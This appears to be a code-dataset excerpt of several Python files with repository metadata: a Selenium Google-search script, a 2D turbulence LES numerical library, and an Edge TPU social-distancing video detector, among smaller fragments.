refinedActorUseCases[actorIdx]["useCases"][storyIdx]["core"].append(tokenIdx)
elif token.dep_ == dependency["DIRECT_OBJECT"] and (token.head.dep_ == dependency["ROOT"] or token.head.dep_ == dependency["CONJUGATION"]):
refinedActorUseCases[actorIdx]["useCases"][storyIdx]["core"].append(tokenIdx)
elif token.dep_ == dependency["DIRECT_OBJECT"] and token.head.dep_ == dependency["CLAUSAL_COMPLEMENT"] and token.head.head.dep_ == dependency["ROOT"] and token.pos_ != "DET":
refinedActorUseCases[actorIdx]["useCases"][storyIdx]["core"].append(tokenIdx)
return refinedActorUseCases
|
[
"wojtunikdw@gmail.com"
] |
wojtunikdw@gmail.com
|
5b384065ee295c094d90ceb2aaf40d6d07405bed
|
f9a12a55058bca917d794e47151dc62fd0593e74
|
/testCases/search_functionality.py
|
ab4230c8063f72ad3f87a5e291d33249ad2f2a62
|
[] |
no_license
|
RakshaKShetty/google_search_Func
|
a206f4c20fd31533f06ff862c14cb55eb98cd9d2
|
ab64958b975ef530a8c93495ef32c00195e52ee1
|
refs/heads/main
| 2023-04-10T17:45:21.120518
| 2021-04-01T05:03:09
| 2021-04-01T05:03:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
from selenium import webdriver
import time
from selenium.webdriver.common.keys import Keys
driver = webdriver.Chrome(executable_path="D:\Drivers\chromedriver.exe")
driver.set_page_load_timeout("10")
driver.get("https://www.google.com/")
driver.maximize_window()
que = driver.find_element_by_name("q")
que.send_keys("Software Testing")
time.sleep(3)
que.send_keys(Keys.ARROW_DOWN)
que.send_keys(Keys.RETURN)
|
[
"rasharaksha@gmail.com"
] |
rasharaksha@gmail.com
|
ea01c65d112a128bd1b7639e3c9175ad83806d63
|
c3ead530bd898c3cf42b3687ae74911bd02bdb7a
|
/turbulence_closure_les/utils.py
|
45b2c7094c1c3a564e56ffbe29ccb031687afb9a
|
[] |
no_license
|
chandanbose/PAR-RL
|
19fc2b545de7a0cd10bb9efee307b7b211fa9130
|
043fd4f8f4834626c7d400dd4eabfa46521d9320
|
refs/heads/master
| 2022-12-09T05:18:49.366495
| 2020-09-23T17:28:30
| 2020-09-23T17:28:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,406
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 17 21:45:02 2020
@author: suraj
"""
import numpy as np
from numpy.random import seed
seed(1)
import pyfftw
from scipy import integrate
from scipy import linalg
import matplotlib.pyplot as plt
import time as tm
import matplotlib.ticker as ticker
import os
from numba import jit
font = {'family' : 'Times New Roman',
'size' : 14}
plt.rc('font', **font)
import matplotlib as mpl
mpl.rcParams['text.usetex'] = True
mpl.rcParams['text.latex.preamble'] = [r'\usepackage{amsmath}']
#%%
@jit
def bc(nx,ny,u):
u[:,0] = u[:,ny]
u[:,1] = u[:,ny+1]
u[:,ny+3] = u[:,3]
u[:,ny+4] = u[:,4]
u[0,:] = u[nx,:]
u[1,:] = u[nx+1,:]
u[nx+3,:] = u[3,:]
u[nx+4,:] = u[4,:]
return u
#%%
# fast poisson solver using second-order central difference scheme
def fpsd(nx, ny, dx, dy, f):
epsilon = 1.0e-6
aa = -2.0/(dx*dx) - 2.0/(dy*dy)
bb = 2.0/(dx*dx)
cc = 2.0/(dy*dy)
hx = 2.0*np.pi/np.float64(nx)
hy = 2.0*np.pi/np.float64(ny)
kx = np.empty(nx)
ky = np.empty(ny)
kx[:] = hx*np.float64(np.arange(0, nx))
ky[:] = hy*np.float64(np.arange(0, ny))
kx[0] = epsilon
ky[0] = epsilon
kx, ky = np.meshgrid(np.cos(kx), np.cos(ky), indexing='ij')
data = np.empty((nx,ny), dtype='complex128')
data1 = np.empty((nx,ny), dtype='complex128')
data[:,:] = np.vectorize(complex)(f[0:nx,0:ny],0.0)
a = pyfftw.empty_aligned((nx,ny),dtype= 'complex128')
b = pyfftw.empty_aligned((nx,ny),dtype= 'complex128')
fft_object = pyfftw.FFTW(a, b, axes = (0,1), direction = 'FFTW_FORWARD')
fft_object_inv = pyfftw.FFTW(a, b,axes = (0,1), direction = 'FFTW_BACKWARD')
e = fft_object(data)
#e = pyfftw.interfaces.scipy_fftpack.fft2(data)
e[0,0] = 0.0
data1[:,:] = e[:,:]/(aa + bb*kx[:,:] + cc*ky[:,:])
ut = np.real(fft_object_inv(data1))
#periodicity
u = np.empty((nx+1,ny+1))
u[0:nx,0:ny] = ut
u[:,ny] = u[:,0]
u[nx,:] = u[0,:]
u[nx,ny] = u[0,0]
return u
#%%
@jit
def les_filter(nx,ny,nxc,nyc,u):
'''
coarsen the solution field keeping the size of the data same
Inputs
------
nx,ny : number of grid points in x and y direction on fine grid
nxc,nyc : number of grid points in x and y direction on coarse grid
u : solution field on fine grid
Output
------
uc : coarsened solution field [nx+1, ny+1]
'''
uf = np.fft.fft2(u[0:nx,0:ny])
uf[int(nxc/2):int(nx-nxc/2),:] = 0.0
uf[:,int(nyc/2):int(ny-nyc/2)] = 0.0
utc = np.real(np.fft.ifft2(uf))
uc = np.zeros((nx+1,ny+1))
uc[0:nx,0:ny] = utc
# periodic bc
uc[:,ny] = uc[:,0]
uc[nx,:] = uc[0,:]
uc[nx,ny] = uc[0,0]
return uc
#%%
def grad_spectral(nx,ny,u):
'''
compute the gradient of u using spectral differentiation
Inputs
------
nx,ny : number of grid points in x and y direction on fine grid
u : solution field
Output
------
ux : du/dx (size = [nx+1,ny+1])
uy : du/dy (size = [nx+1,ny+1])
'''
ux = np.empty((nx+1,ny+1))
uy = np.empty((nx+1,ny+1))
uf = np.fft.fft2(u[0:nx,0:ny])
kx = np.fft.fftfreq(nx,1/nx)
ky = np.fft.fftfreq(ny,1/ny)
kx = kx.reshape(nx,1)
ky = ky.reshape(1,ny)
uxf = 1.0j*kx*uf
uyf = 1.0j*ky*uf
ux[0:nx,0:ny] = np.real(np.fft.ifft2(uxf))
uy[0:nx,0:ny] = np.real(np.fft.ifft2(uyf))
# periodic bc
ux[:,ny] = ux[:,0]
ux[nx,:] = ux[0,:]
ux[nx,ny] = ux[0,0]
# periodic bc
uy[:,ny] = uy[:,0]
uy[nx,:] = uy[0,:]
uy[nx,ny] = uy[0,0]
return ux,uy
#%%
def dyn_smag(nx,ny,kappa,sc,wc):
'''
compute the eddy viscosity using Germanos dynamics procedure with Lilys
least square approximation
Inputs
------
nx,ny : number of grid points in x and y direction on fine grid
kapppa : sub-filter grid filter ratio
wc : vorticity on LES grid
sc : streamfunction on LES grid
Output
------
ev : (cs*delta)**2*|S| (size = [nx+1,ny+1])
'''
nxc = int(nx/kappa)
nyc = int(ny/kappa)
scc = les_filter(nx,ny,nxc,nyc,sc[2:nx+3,2:ny+3])
wcc = les_filter(nx,ny,nxc,nyc,wc[2:nx+3,2:ny+3])
scx,scy = grad_spectral(nx,ny,sc[2:nx+3,2:ny+3])
wcx,wcy = grad_spectral(nx,ny,wc[2:nx+3,2:ny+3])
wcxx,wcxy = grad_spectral(nx,ny,wcx)
wcyx,wcyy = grad_spectral(nx,ny,wcy)
scxx,scxy = grad_spectral(nx,ny,scx)
scyx,scyy = grad_spectral(nx,ny,scy)
dac = np.sqrt(4.0*scxy**2 + (scxx - scyy)**2) # |\bar(s)|
dacc = les_filter(nx,ny,nxc,nyc,dac) # |\tilde{\bar{s}}| = \tilde{|\bar(s)|}
sccx,sccy = grad_spectral(nx,ny,scc)
wccx,wccy = grad_spectral(nx,ny,wcc)
wccxx,wccxy = grad_spectral(nx,ny,wccx)
wccyx,wccyy = grad_spectral(nx,ny,wccy)
scy_wcx = scy*wcx
scx_wcy = scx*wcy
scy_wcx_c = les_filter(nx,ny,nxc,nyc,scy_wcx)
scx_wcy_c = les_filter(nx,ny,nxc,nyc,scx_wcy)
h = (sccy*wccx - sccx*wccy) - (scy_wcx_c - scx_wcy_c)
t = dac*(wcxx + wcyy)
tc = les_filter(nx,ny,nxc,nyc,t)
m = kappa**2*dacc*(wccxx + wccyy) - tc
hm = h*m
mm = m*m
CS2 = (np.sum(0.5*(hm + abs(hm)))/np.sum(mm))
ev = CS2*dac
return ev
#%%
def stat_smag(nx,ny,dx,dy,s,cs):
dsdxy = (1.0/(4.0*dx*dy))*(s[1:nx+2,1:ny+2] + s[3:nx+4,3:ny+4] \
-s[3:nx+4,1:ny+2] - s[1:nx+2,3:ny+4])
dsdxx = (1.0/(dx*dx))*(s[3:nx+4,2:ny+3] - 2.0*s[2:nx+3,2:ny+3] \
+s[1:nx+2,2:ny+3])
dsdyy = (1.0/(dy*dy))*(s[2:nx+3,3:ny+4] - 2.0*s[2:nx+3,2:ny+3] \
+s[2:nx+3,1:ny+2])
ev = cs*cs*dx*dy*np.sqrt(4.0*dsdxy*dsdxy + (dsdxx-dsdyy)*(dsdxx-dsdyy))
return ev
#%%
def coarsen(nx,ny,nxc,nyc,u):
'''
coarsen the solution field along with the size of the data
Inputs
------
nx,ny : number of grid points in x and y direction on fine grid
nxc,nyc : number of grid points in x and y direction on coarse grid
u : solution field on fine grid
Output
------
uc : solution field on coarse grid [nxc , nyc]
'''
uf = np.fft.fft2(u[0:nx,0:ny])
ufc = np.zeros((nxc,nyc),dtype='complex')
ufc [0:int(nxc/2),0:int(nyc/2)] = uf[0:int(nxc/2),0:int(nyc/2)]
ufc [int(nxc/2):,0:int(nyc/2)] = uf[int(nx-nxc/2):,0:int(nyc/2)]
ufc [0:int(nxc/2),int(nyc/2):] = uf[0:int(nxc/2),int(ny-nyc/2):]
ufc [int(nxc/2):,int(nyc/2):] = uf[int(nx-nxc/2):,int(ny-nyc/2):]
ufc = ufc*(nxc*nyc)/(nx*ny)
utc = np.real(np.fft.ifft2(ufc))
uc = np.zeros((nxc+1,nyc+1))
uc[0:nxc,0:nyc] = utc
uc[:,nyc] = uc[:,0]
uc[nxc,:] = uc[0,:]
uc[nxc,nyc] = uc[0,0]
return uc
#%%
# compute jacobian using arakawa scheme
# computed at all physical domain points (1:nx+1,1:ny+1; all boundary points included)
# no ghost points
def jacobian(nx,ny,dx,dy,re,w,s):
gg = 1.0/(4.0*dx*dy)
hh = 1.0/3.0
# Arakawa
j1 = gg*( (w[3:nx+4,2:ny+3]-w[1:nx+2,2:ny+3])*(s[2:nx+3,3:ny+4]-s[2:nx+3,1:ny+2]) \
-(w[2:nx+3,3:ny+4]-w[2:nx+3,1:ny+2])*(s[3:nx+4,2:ny+3]-s[1:nx+2,2:ny+3]))
j2 = gg*( w[3:nx+4,2:ny+3]*(s[3:nx+4,3:ny+4]-s[3:nx+4,1:ny+2]) \
- w[1:nx+2,2:ny+3]*(s[1:nx+2,3:ny+4]-s[1:nx+2,1:ny+2]) \
- w[2:nx+3,3:ny+4]*(s[3:nx+4,3:ny+4]-s[1:nx+2,3:ny+4]) \
+ w[2:nx+3,1:ny+2]*(s[3:nx+4,1:ny+2]-s[1:nx+2,1:ny+2]))
j3 = gg*( w[3:nx+4,3:ny+4]*(s[2:nx+3,3:ny+4]-s[3:nx+4,2:ny+3]) \
- w[1:nx+2,1:ny+2]*(s[1:nx+2,2:ny+3]-s[2:nx+3,1:ny+2]) \
- w[1:nx+2,3:ny+4]*(s[2:nx+3,3:ny+4]-s[1:nx+2,2:ny+3]) \
+ w[3:nx+4,1:ny+2]*(s[3:nx+4,2:ny+3]-s[2:nx+3,1:ny+2]) )
jac = (j1+j2+j3)*hh
return jac
#%%
# compute the energy spectrum numerically
def energy_spectrumd(nx,ny,dx,dy,w):
epsilon = 1.0e-6
kx = np.empty(nx)
ky = np.empty(ny)
kx[0:int(nx/2)] = 2*np.pi/(np.float64(nx)*dx)*np.float64(np.arange(0,int(nx/2)))
kx[int(nx/2):nx] = 2*np.pi/(np.float64(nx)*dx)*np.float64(np.arange(-int(nx/2),0))
ky[0:ny] = kx[0:ny]
kx[0] = epsilon
ky[0] = epsilon
kx, ky = np.meshgrid(kx, ky, indexing='ij')
a = pyfftw.empty_aligned((nx,ny),dtype= 'complex128')
b = pyfftw.empty_aligned((nx,ny),dtype= 'complex128')
fft_object = pyfftw.FFTW(a, b, axes = (0,1), direction = 'FFTW_FORWARD')
wf = fft_object(w[0:nx,0:ny])
es = np.empty((nx,ny))
kk = np.sqrt(kx[:,:]**2 + ky[:,:]**2)
es[:,:] = np.pi*((np.abs(wf[:,:])/(nx*ny))**2)/kk
n = int(np.sqrt(nx*nx + ny*ny)/2.0)-1
en = np.zeros(n+1)
for k in range(1,n+1):
en[k] = 0.0
ic = 0
ii,jj = np.where((kk[1:,1:]>(k-0.5)) & (kk[1:,1:]<(k+0.5)))
ic = ii.size
ii = ii+1
jj = jj+1
en[k] = np.sum(es[ii,jj])
# for i in range(1,nx):
# for j in range(1,ny):
# kk1 = np.sqrt(kx[i,j]**2 + ky[i,j]**2)
# if ( kk1>(k-0.5) and kk1<(k+0.5) ):
# ic = ic+1
# en[k] = en[k] + es[i,j]
en[k] = en[k]/ic
return en, n
#%%
# compute rhs using arakawa scheme (formulas are based on one ghost points,
# borrowed from fdm solver)
# computed at all physical domain points (1:nx+1,1:ny+1; all boundary points included)
# no ghost points
def rhsa(nx,ny,dx,dy,re,we,se):
aa = 1.0/(dx*dx)
bb = 1.0/(dy*dy)
gg = 1.0/(4.0*dx*dy)
hh = 1.0/3.0
f = np.zeros((nx+5,ny+5))
w = we[1:nx+4,1:ny+4]
s = se[1:nx+4,1:ny+4]
#Arakawa
j1 = gg*( (w[2:nx+3,1:ny+2]-w[0:nx+1,1:ny+2])*(s[1:nx+2,2:ny+3]-s[1:nx+2,0:ny+1]) \
-(w[1:nx+2,2:ny+3]-w[1:nx+2,0:ny+1])*(s[2:nx+3,1:ny+2]-s[0:nx+1,1:ny+2]))
j2 = gg*( w[2:nx+3,1:ny+2]*(s[2:nx+3,2:ny+3]-s[2:nx+3,0:ny+1]) \
- w[0:nx+1,1:ny+2]*(s[0:nx+1,2:ny+3]-s[0:nx+1,0:ny+1]) \
- w[1:nx+2,2:ny+3]*(s[2:nx+3,2:ny+3]-s[0:nx+1,2:ny+3]) \
+ w[1:nx+2,0:ny+1]*(s[2:nx+3,0:ny+1]-s[0:nx+1,0:ny+1]))
j3 = gg*( w[2:nx+3,2:ny+3]*(s[1:nx+2,2:ny+3]-s[2:nx+3,1:ny+2]) \
- w[0:nx+1,0:ny+1]*(s[0:nx+1,1:ny+2]-s[1:nx+2,0:ny+1]) \
- w[0:nx+1,2:ny+3]*(s[1:nx+2,2:ny+3]-s[0:nx+1,1:ny+2]) \
+ w[2:nx+3,0:ny+1]*(s[2:nx+3,1:ny+2]-s[1:nx+2,0:ny+1]) )
jac = (j1+j2+j3)*hh
lap = aa*(w[2:nx+3,1:ny+2]-2.0*w[1:nx+2,1:ny+2]+w[0:nx+1,1:ny+2]) \
+ bb*(w[1:nx+2,2:ny+3]-2.0*w[1:nx+2,1:ny+2]+w[1:nx+2,0:ny+1])
#call Smagorinsky model
#cs = 0.18
#ev = smag(nx,ny,dx,dy,s,cs)
#Central difference for Laplacian
# f[1:nx+2,1:ny+2] = -jac + lap/re + ev*lap if using eddy viscosity model for LES
f[2:nx+3,2:ny+3] = -jac + lap/re
return f
#%% serial compact schemes
#-----------------------------------------------------------------------------#
# Solution to tridigonal system using Thomas algorithm
#-----------------------------------------------------------------------------#
def tdms(a,b,c,r,s,e):
gam = np.zeros((e+1))
u = np.zeros((e+1))
bet = b[s]
u[s] = r[s]/bet
for i in range(s+1,e+1):
gam[i] = c[i-1]/bet
bet = b[i] - a[i]*gam[i]
u[i] = (r[i] - a[i]*u[i-1])/bet
for i in range(e-1,s-1,-1):
u[i] = u[i] - gam[i+1]*u[i+1]
return u
#-----------------------------------------------------------------------------#
# Solution to tridigonal system using cyclic Thomas algorithm
#-----------------------------------------------------------------------------#
def ctdms(a,b,c,alpha,beta,r,s,e):
bb = np.zeros((e+1))
u = np.zeros((e+1))
gamma = -b[s]
bb[s] = b[s] - gamma
bb[e] = b[e] - alpha*beta/gamma
# for i in range(s+1,e):
# bb[i] = b[i]
bb[s+1:e] = b[s+1:e]
x = tdms(a,bb,c,r,s,e)
u[s] = gamma
u[e] = alpha
z = tdms(a,bb,c,u,s,e)
fact = (x[s] + beta*x[e]/gamma)/(1.0 + z[s] + beta*z[e]/gamma)
# for i in range(s,e+1):
# x[i] = x[i] - fact*z[i]
x[s:e+1] = x[s:e+1] - fact*z[s:e+1]
return x
#-----------------------------------------------------------------------------#
#cu3dp: 3rd-order compact upwind scheme for the first derivative(up)
# periodic boundary conditions (0=n), h=grid spacing
# p: free upwind paramater suggested (p>0 for upwind)
# p=0.25 in Zhong (JCP 1998)
#
#-----------------------------------------------------------------------------#
def cu3dp(u,p,h,n):
a = np.zeros((n))
b = np.zeros((n))
c = np.zeros((n))
x = np.zeros((n))
r = np.zeros((n))
up = np.zeros((n+1))
a[:] = 1.0 + p
b[:] = 4.0
c[:] = 1.0 - p
# for i in range(1,n):
# r[i] = ((-3.0-2.0*p)*u[i-1] + 4.0*p*u[i] + (3.0-2.0*p)*u[i+1])/h
r[1:n] = ((-3.0-2.0*p)*u[0:n-1] + 4.0*p*u[1:n] + (3.0-2.0*p)*u[2:n+1])/h
r[0] = ((-3.0-2.0*p)*u[n-1] + 4.0*p*u[0] + (3.0-2.0*p)*u[1])/h
alpha = 1.0 - p
beta = 1.0 + p
x = ctdms(a,b,c,alpha,beta,r,0,n-1)
up[0:n] = x[0:n]
up[n] = up[0]
return up
#-----------------------------------------------------------------------------#
# c4dp: 4th-order compact scheme for first-degree derivative(up)
# periodic boundary conditions (0=n), h=grid spacing
# tested
#
#-----------------------------------------------------------------------------#
def c4dp(u,h,n):
a = np.zeros((n))
b = np.zeros((n))
c = np.zeros((n))
x = np.zeros((n))
r = np.zeros((n))
up = np.zeros((n+1))
a[:] = 1.0/4.0
b[:] = 1.0
c[:] = 1.0/4.0
# for i in range(1,n):
# r[i] = (3.0/2.0)*(u[i+1] - u[i-1])/(2.0*h)
r[1:n] = (3.0/2.0)*(u[2:n+1] - u[0:n-1])/(2.0*h)
r[0] = (3.0/2.0)*(u[1] - u[n-1])/(2.0*h)
alpha = 1.0/4.0
beta = 1.0/4.0
x = ctdms(a,b,c,alpha,beta,r,0,n-1)
up[0:n] = x[0:n]
up[n] = up[0]
return up
#-----------------------------------------------------------------------------#
# c4ddp: 4th-order compact scheme for first-degree derivative(up)
# periodic boundary conditions (0=n), h=grid spacing
# tested
#
#-----------------------------------------------------------------------------#
def c4ddp(u,h,n):
a = np.zeros((n))
b = np.zeros((n))
c = np.zeros((n))
x = np.zeros((n))
r = np.zeros((n))
upp = np.zeros((n+1))
a[:] = 1.0/10.0
b[:] = 1.0
c[:] = 1.0/10.0
# for i in range(1,n):
# r[i] = (6.0/5.0)*(u[i-1] - 2.0*u[i] + u[i+1])/(h*h)
r[1:n] = (6.0/5.0)*(u[0:n-1] - 2.0*u[1:n] + u[2:n+1])/(h*h)
r[0] = (6.0/5.0)*(u[n-1] - 2.0*u[0] + u[1])/(h*h)
alp = 1.0/10.0
beta = 1.0/10.0
x = ctdms(a,b,c,alp,beta,r,0,n-1)
upp[0:n] = x[0:n]
upp[n] = upp[0]
return upp
#%% rhs
def rhs_cu3(nx,ny,dx,dy,re,pCU3,w,s):
lap = np.zeros((nx+5,ny+5))
jac = np.zeros((nx+5,ny+5))
f = np.zeros((nx+5,ny+5))
# compute wxx
for j in range(2,ny+3):
a = w[2:nx+3,j]
wxx = c4ddp(a,dx,nx)
lap[2:nx+3,j] = wxx[:]
# compute wyy
for i in range(2,nx+3):
a = w[i,2:ny+3]
wyy = c4ddp(a,dx,nx)
lap[i,2:ny+3] = lap[i,2:ny+3] + wyy[:]
# Jacobian (convective term): upwind
# sy: u
sy = np.zeros((nx+1,ny+1))
for i in range(2,nx+3):
a = s[i,2:ny+3]
sy[i-2,:] = c4dp(a,dx,nx)
# computation of wx
wxp = np.zeros((nx+1,ny+1))
wxn = np.zeros((nx+1,ny+1))
for j in range(2,ny+3):
a = w[2:nx+3,j]
wxp[:,j-2] = cu3dp(a, pCU3, dx, nx) # upwind for wx
wxn[:,j-2] = cu3dp(a, -pCU3, dx, nx) # downwind for wx
# upwinding
syp = np.where(sy>0,sy,0) # max(sy[i,j],0)
syn = np.where(sy<0,sy,0) # min(sy[i,j],0)
# sx: -v
sx = np.zeros((nx+1,ny+1))
for j in range(2,ny+3):
a = s[2:nx+3,j]
sx[:,j-2] = -c4dp(a, dx, nx)
# computation of wy
wyp = np.zeros((nx+1,ny+1))
wyn = np.zeros((nx+1,ny+1))
for i in range(2,nx+3):
a = w[i,2:ny+3]
wyp[i-2,:] = cu3dp(a, pCU3, dy, ny) # upwind for wy
wyn[i-2,:] = cu3dp(a, -pCU3, dy, ny) # downwind for wy
# upwinding
sxp = np.where(sx>0,sx,0) # max(sx[i,j],0)
sxn = np.where(sx<0,sx,0) # min(sx[i,j],0)
jac[2:nx+3,2:ny+3] = (syp*wxp + syn*wxn) + (sxp*wyp + sxn*wyn)
f[2:nx+3,2:ny+3] = -jac[2:nx+3,2:ny+3] + lap[2:nx+3,2:ny+3]/re
del sy, sx, syp, syn, sxp, sxn, wxp, wxn, wyp, wyn
return f
#%%
def rhs_compact(nx,ny,dx,dy,re,w,s):
lap = np.zeros((nx+5,ny+5))
jac = np.zeros((nx+5,ny+5))
f = np.zeros((nx+5,ny+5))
# compute wxx
for j in range(2,ny+3):
a = w[2:nx+3,j]
wxx = c4ddp(a,dx,nx)
lap[2:nx+3,j] = wxx[:]
# compute wyy
for i in range(2,nx+3):
a = w[i,2:ny+3]
wyy = c4ddp(a,dx,nx)
lap[i,2:ny+3] = lap[i,2:ny+3] + wyy[:]
# Jacobian (convective term): upwind
# sy
sy = np.zeros((nx+1,ny+1))
for i in range(2,nx+3):
a = s[i,2:ny+3]
sy[i-2,:] = c4dp(a,dx,nx)
# computation of wx
wx = np.zeros((nx+1,ny+1))
for j in range(2,ny+3):
a = w[2:nx+3,j]
wx[:,j-2] = c4dp(a,dx,nx)
# sx
sx = np.zeros((nx+1,ny+1))
for j in range(2,ny+3):
a = s[2:nx+3,j]
sx[:,j-2] = c4dp(a, dx, nx)
# computation of wy
wy = np.zeros((nx+1,ny+1))
for i in range(2,nx+3):
a = w[i,2:ny+3]
wy[i-2,:] = c4dp(a, dx, nx)
jac[2:nx+3,2:ny+3] = (sy*wx - sx*wy)
f[2:nx+3,2:ny+3] = -jac[2:nx+3,2:ny+3] + lap[2:nx+3,2:ny+3]/re
del sy, wx, sx, wy
return f
|
[
"surajp92@vt.edu"
] |
surajp92@vt.edu
|
18ba5290a9a85aa635408ceba37bbb7ee9cd17dc
|
da47f92a3595f8883a734c195545f2746ddefa36
|
/social-distance-detector Edge/Mobilnet/detect_video_social_distance_streaming.py
|
57ccad9d6e13b5e9d79172866c9d48736e7b92ab
|
[] |
no_license
|
Eufalo/Social-Distance-Detector
|
b2e2a146b47cfb84636ae31d2556e28987ccad58
|
e165e08079f397271cf7c773e4d76b5b12c66332
|
refs/heads/master
| 2022-12-16T06:14:54.375563
| 2020-09-17T22:01:31
| 2020-09-17T22:01:31
| 296,444,322
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,779
|
py
|
# USAGE
# python detect_video.py --model mobilenet_ssd_v2/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite --labels mobilenet_ssd_v2/coco_labels.txt
# import the necessary packages
from edgetpu.detection.engine import DetectionEngine
from scipy.spatial import distance as dist
import birdView_tranform as bd_vie_trans
from imutils.video import VideoStream
from PIL import Image
import numpy as np
import argparse
import imutils
import time
import yaml
import cv2
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input", type=str, default="",
help="path to (optional) input video file")
ap.add_argument("-m", "--model", required=True,
help="path to TensorFlow Lite object detection model")
ap.add_argument("-l", "--labels", required=True,
help="path to labels file")
ap.add_argument("-c", "--confidence", type=float, default=0.6,
help="minimum probability to filter weak detections")
args = vars(ap.parse_args())
# initialize the labels dictionary
print("[INFO] parsing class labels...")
labels = {}
# loop over the class labels file
for row in open(args["labels"]):
# unpack the row and update the labels dictionary
(classID, label) = row.strip().split(maxsplit=1)
labels[int(classID)] = label.strip()
# load the Google Coral object detection model
print("[INFO] loading Coral model...")
model = DetectionEngine(args["model"])
# initialize the video stream and allow the camera sensor to warmup
print("[INFO] starting video stream...")
vs = cv2.VideoCapture(args["input"] if args["input"] else 0)#VideoStream(src=0).start()
#vs = VideoStream(usePiCamera=False).start()
time.sleep(2.0)
#Flag start detection
detection_flag=False;
"""
#Configure the bird eye
with open("config_bird_view.yml", "r") as ymlfile:
cfg = yaml.load(ymlfile)
width_og, height_og = 0,0
corner_points = []
for section in cfg:
corner_points.append(cfg["image_parameters"]["p1"])
corner_points.append(cfg["image_parameters"]["p2"])
corner_points.append(cfg["image_parameters"]["p3"])
corner_points.append(cfg["image_parameters"]["p4"])
width_og = int(cfg["image_parameters"]["width_og"])
height_og = int(cfg["image_parameters"]["height_og"])
img_path = cfg["image_parameters"]["img_path"]
#size_frame = cfg["image_parameters"]["size_frame"]
"""
dim = (700, 400)
'''
convert pixel to meter when the video start must be press s to add one object target
and his hight (cm) to make the coversion pixel cm
'''
conv_one_pixel_cm=0.0
# loop over the frames from the video stream
while True:
# grab the frame from the threaded video stream and resize it
# to have a maximum width of 700 pixels
#frame = vs.read()
(grabbed, frame) = vs.read()
if not grabbed:
break
frame = imutils.resize(frame, width=700,height=700)
orig = frame.copy()
# prepare the frame for object detection by converting (1) it
# from BGR to RGB channel ordering and then (2) from a NumPy
# array to PIL image format
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = Image.fromarray(frame)
img = cv2.imread("bird_eye_img.png")
bird_view_img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)
# make predictions on the input frame
start = time.time()
if(detection_flag):
#Social distancia conversion cm to pixeles
social_distance_min=int(200*conv_one_pixel_cm) if conv_one_pixel_cm >0 else 50
results = model.detect_with_image(frame, threshold=args["confidence"],
keep_aspect_ratio=True, relative_coord=False)
end = time.time()
# initialize the set of indexes that violate the minimum social distance
violate = set()
#Return only the person detection
rects_ = np.array([r.bounding_box.flatten().astype("int") if r.label_id==0 else "" for r in results])
centroids=bd_vie_trans.rect_to_centroids(rects_)
if len(centroids) >= 2:
D = dist.cdist(centroids, centroids, metric="euclidean")
# loop over the upper triangular of the distance matrix
for i in range(0, D.shape[0]):
for j in range(i + 1, D.shape[1]):
# check to see if the distance between any two
# centroid pairs is less than the configured number
# of pixels
if D[i, j] < social_distance_min:#50
# update our violation set with the indexes of
# the centroid pairs
violate.add(i)
violate.add(j)
# loop over the results
for i,r in enumerate(results):
# extract the bounding box and box and predicted class label
box = r.bounding_box.flatten().astype("int")
(startX, startY, endX, endY) = box
cX = int((startX+endX)/2)
cY=int((startY+endY)/2)
color = (0, 255, 0)
if i in violate:
color =(0,0,255)
#Trasnform the detection to the bird eye
if (r.label_id==0):
bird_points=bd_vie_trans.bird_transform(400,400,frame,[cX,endY])
label = labels[r.label_id]
#drw bird points
x,y = bird_points[0]
#radius for visualice the social distance
aux_circl_bird=int(social_distance_min/2) if conv_one_pixel_cm >0 else 25
cv2.circle(bird_view_img, (x,y), aux_circl_bird, color, 2)
cv2.circle(bird_view_img, (x,y), 3, color, -1)
'''
# draw the bounding box and label on the image
cv2.rectangle(orig, (startX, startY), (endX, endY),
color, 2)
'''
#Centroid circle drow
cv2.circle(orig, (cX, cY), 5, color, 1)
#Drwa social distance
aux_elipse_d=int(social_distance_min) if conv_one_pixel_cm >0 else 45
aux_elipse_o=int(aux_elipse_d/2.25) if conv_one_pixel_cm >0 else 20
'''int(social_distance_min/3)'''
cv2.ellipse(orig,(cX,endY),(aux_elipse_d,aux_elipse_o),0,0,360,color,1)
# draw the total number of social distancing violations on the
# output frame
text = "Social Distancing Violations: {}".format(len(violate))
cv2.putText(orig, text, (10, orig.shape[0] - 25),
cv2.FONT_HERSHEY_SIMPLEX, 0.85, (0, 0, 255), 3)
'''
y = startY - 15 if startY - 15 > 15 else startY + 15
text = "{}: {:.2f}%".format(label, r.score * 100)
cv2.putText(orig, text, (startX, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
'''
# show the output frame and wait for a key press
cv2.imshow("Frame", orig)
cv2.imshow("bird", bird_view_img)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
elif key == ord("d"):
detection_flag=False if detection_flag else True;
elif key == ord("s"):
# select the bounding box of the object we want to track (make
# sure you press ENTER or SPACE after selecting the ROI)
box = cv2.selectROI("Frame", orig, fromCenter=False,showCrosshair=True)
hight = input("Target hight (cm) ")
conv_one_pixel_cm =box[3]/float(hight)
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
|
[
"adrian.gallegosanchez@gmail.com"
] |
adrian.gallegosanchez@gmail.com
|
4b0cd507b0fe4a7edf15fe8c9200e2b3b34115f5
|
59522e46a73630181f19251b8bfef90e497c2f82
|
/coop_cms/apps/test_app/forms.py
|
a28945b3361774cf45cf14979bb0f7de7f2e8161
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
ljean/coop_cms
|
9befe74edda007686007f8566cd2555856099ae8
|
9e6c70afb61b57dc0326fbb64f9d6b19c04f48a1
|
refs/heads/master
| 2023-07-11T16:02:35.945029
| 2023-06-30T12:16:26
| 2023-06-30T12:16:26
| 5,846,409
| 3
| 5
|
NOASSERTION
| 2019-08-30T10:55:02
| 2012-09-17T19:53:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,084
|
py
|
# -*- coding: utf-8 -*-
"""forms"""
